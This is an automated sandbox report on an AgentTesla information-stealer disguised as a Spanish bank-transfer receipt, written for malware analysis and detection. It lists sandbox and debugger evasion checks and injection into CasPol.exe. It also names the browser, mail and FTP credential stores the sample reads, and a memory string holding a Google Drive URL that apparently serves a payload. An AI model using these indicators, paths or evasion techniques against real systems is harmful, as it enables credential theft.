Source: C:\Users\user\Desktop\justificante de la transfer.exe	Code function: 0_2_0230054C push ebx; iretd	0_2_0230054D
Source: C:\Users\user\Desktop\justificante de la transfer.exe	Code function: 0_2_0230158E push ecx; iretd	0_2_02301593
Source: C:\Users\user\Desktop\justificante de la transfer.exe	Code function: 0_2_023015C2 push ds; iretd	0_2_023015C9
Source: C:\Users\user\Desktop\justificante de la transfer.exe	Code function: 0_2_02303DC2 push 26441584h; iretd	0_2_02303DCF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 11_2_00A047D8 pushfd ; ret	11_2_00A04939
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 11_2_00A05908 push eax; retf	11_2_00A05909

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate

Jump to behavior

Source: C:\Users\user\Desktop\justificante de la transfer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Tries to detect Any.run

Show sources

Source: C:\Users\user\Desktop\justificante de la transfer.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Users\user\Desktop\justificante de la transfer.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: justificante de la transfer.exe, 00000000.00000002.933025555.00000000006A4000.00000004.00000020.sdmp	Binary or memory string: \??\C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC
Source: justificante de la transfer.exe, 00000000.00000002.935718483.0000000005410000.00000004.00000001.sdmp	Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32APPDATA=WINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\CASPOL.EXE\SYSWOW64\MSVBVM60.DLLWINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\CASPOL.EXE\SYSWOW64\MSVBVM60.DLL
Source: justificante de la transfer.exe, 00000000.00000002.935718483.0000000005410000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.5671286322.0000000000D00000.00000004.00000001.sdmp	Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Source: CasPol.exe, 0000000B.00000002.5671286322.0000000000D00000.00000004.00000001.sdmp	Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32APPDATA=HTTPS://DRIVE.GOOGLE.COM/UC?EXPORT=DOWNLOAD&ID=1BI-SJR4KZFRIPFDPNOXJN3S8BMNH3ZRT

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 4228

Thread sleep time: -2767011611056431s >= -30000s

Jump to behavior

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\user\Desktop\justificante de la transfer.exe	Window / User API: threadDelayed 9998			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Window / User API: threadDelayed 9947			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\user\Desktop\justificante de la transfer.exe

System information queried: ModuleInformation

Jump to behavior

Source: justificante de la transfer.exe, 00000000.00000002.935848757.00000000054D9000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.5685436026.00000000029C9000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Guest Shutdown Service
Source: CasPol.exe, 0000000B.00000002.5674515926.0000000000EE6000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAWX
Source: justificante de la transfer.exe, 00000000.00000002.935848757.00000000054D9000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.5685436026.00000000029C9000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Remote Desktop Virtualization Service
Source: CasPol.exe, 0000000B.00000002.5685436026.00000000029C9000.00000004.00000001.sdmp	Binary or memory string: vmicshutdown
Source: justificante de la transfer.exe, 00000000.00000002.935848757.00000000054D9000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.5685436026.00000000029C9000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Volume Shadow Copy Requestor
Source: CasPol.exe, 0000000B.00000002.5677591920.0000000000F56000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAWG$s
Source: justificante de la transfer.exe, 00000000.00000002.935848757.00000000054D9000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.5685436026.00000000029C9000.00000004.00000001.sdmp	Binary or memory string: Hyper-V PowerShell Direct Service
Source: justificante de la transfer.exe, 00000000.00000002.935848757.00000000054D9000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.5685436026.00000000029C9000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Time Synchronization Service
Source: CasPol.exe, 0000000B.00000002.5685436026.00000000029C9000.00000004.00000001.sdmp	Binary or memory string: vmicvss
Source: CasPol.exe, 0000000B.00000002.5677591920.0000000000F56000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAW
Source: CasPol.exe, 0000000B.00000002.5671286322.0000000000D00000.00000004.00000001.sdmp	Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32APPDATA=https://drive.google.com/uc?export=download&id=1Bi-sjR4KzfRIPfdPNOxJn3S8BMnh3zRT
Source: justificante de la transfer.exe, 00000000.00000002.933025555.00000000006A4000.00000004.00000020.sdmp	Binary or memory string: \??\C:\Program Files\Qemu-ga\qemu-ga.exeC
Source: justificante de la transfer.exe, 00000000.00000002.935718483.0000000005410000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.5671286322.0000000000D00000.00000004.00000001.sdmp	Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: justificante de la transfer.exe, 00000000.00000002.935848757.00000000054D9000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.5685436026.00000000029C9000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Data Exchange Service
Source: justificante de la transfer.exe, 00000000.00000002.935848757.00000000054D9000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.5685436026.00000000029C9000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Heartbeat Service
Source: justificante de la transfer.exe, 00000000.00000002.935848757.00000000054D9000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.5685436026.00000000029C9000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Guest Service Interface
Source: justificante de la transfer.exe, 00000000.00000002.935718483.0000000005410000.00000004.00000001.sdmp	Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32APPDATA=windir=\Microsoft.NET\Framework\v4.0.30319\caspol.exe\syswow64\msvbvm60.dllwindir=\Microsoft.NET\Framework\v4.0.30319\caspol.exe\syswow64\msvbvm60.dll
Source: CasPol.exe, 0000000B.00000002.5685436026.00000000029C9000.00000004.00000001.sdmp	Binary or memory string: vmicheartbeat

Anti Debugging:

Hides threads from debuggers

Show sources

Source: C:\Users\user\Desktop\justificante de la transfer.exe	Thread information set: HideFromDebugger			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread information set: HideFromDebugger			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\justificante de la transfer.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: 11_2_00A07100 LdrInitializeThunk,

11_2_00A07100

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

Writes to foreign memory regions

Show sources

Source: C:\Users\user\Desktop\justificante de la transfer.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: B00000

Jump to behavior

Source: C:\Users\user\Desktop\justificante de la transfer.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\justificante de la transfer.exe"			Jump to behavior
Source: C:\Users\user\Desktop\justificante de la transfer.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\justificante de la transfer.exe"			Jump to behavior

Source: CasPol.exe, 0000000B.00000002.5683872339.0000000001570000.00000002.00020000.sdmp	Binary or memory string: Program Manager
Source: CasPol.exe, 0000000B.00000002.5683872339.0000000001570000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: CasPol.exe, 0000000B.00000002.5683872339.0000000001570000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: CasPol.exe, 0000000B.00000002.5683872339.0000000001570000.00000002.00020000.sdmp	Binary or memory string: Progmanlock

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected AgentTesla

Show sources

Source: Yara match	File source: 0000000B.00000002.5698566884.000000001DC81000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: CasPol.exe PID: 8676, type: MEMORYSTR

Tries to steal Mail credentials (via file / registry access)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Jump to behavior

Tries to harvest and steal ftp login credentials

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\			Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior

Source: Yara match	File source: 0000000B.00000002.5698566884.000000001DC81000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: CasPol.exe PID: 8676, type: MEMORYSTR

Remote Access Functionality:

Yara detected AgentTesla

Show sources

Source: Yara match	File source: 0000000B.00000002.5698566884.000000001DC81000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: CasPol.exe PID: 8676, type: MEMORYSTR

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation211	DLL Side-Loading1	Process Injection112	Masquerading1	OS Credential Dumping2	Query Registry1	Remote Services	Email Collection1	Exfiltration Over Other Network Medium	Encrypted Channel21	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	DLL Side-Loading1	Disable or Modify Tools1	Credentials in Registry1	Security Software Discovery421	Remote Desktop Protocol	Archive Collected Data1	Exfiltration Over Bluetooth	Non-Standard Port1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Virtualization/Sandbox Evasion341	Security Account Manager	Process Discovery2	SMB/Windows Admin Shares	Data from Local System2	Automated Exfiltration	Ingress Tool Transfer1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Process Injection112	NTDS	Virtualization/Sandbox Evasion341	Distributed Component Object Model	Input Capture	Scheduled Transfer	Non-Application Layer Protocol2	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Obfuscated Files or Information1	LSA Secrets	Application Window Discovery1	SSH	Keylogging	Data Transfer Size Limits	Application Layer Protocol123	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	DLL Side-Loading1	Cached Domain Credentials	File and Directory Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Compile After Delivery	DCSync	System Information Discovery115	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
justificante de la transfer.exe	22%	Virustotal		Browse
justificante de la transfer.exe	11%	ReversingLabs	Win32.Trojan.Shelsy

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
neopyme.com	0%	Virustotal		Browse
x1.i.lencr.org	1%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
http://x1.i.lencr.org/U	0%	Avira URL Cloud	safe
http://127.0.0.1:HTTP/1.1	0%	Avira URL Cloud	safe
http://x1.i.lencr.org/	0%	Avira URL Cloud	safe
http://DynDns.comDynDNS	0%	Avira URL Cloud	safe
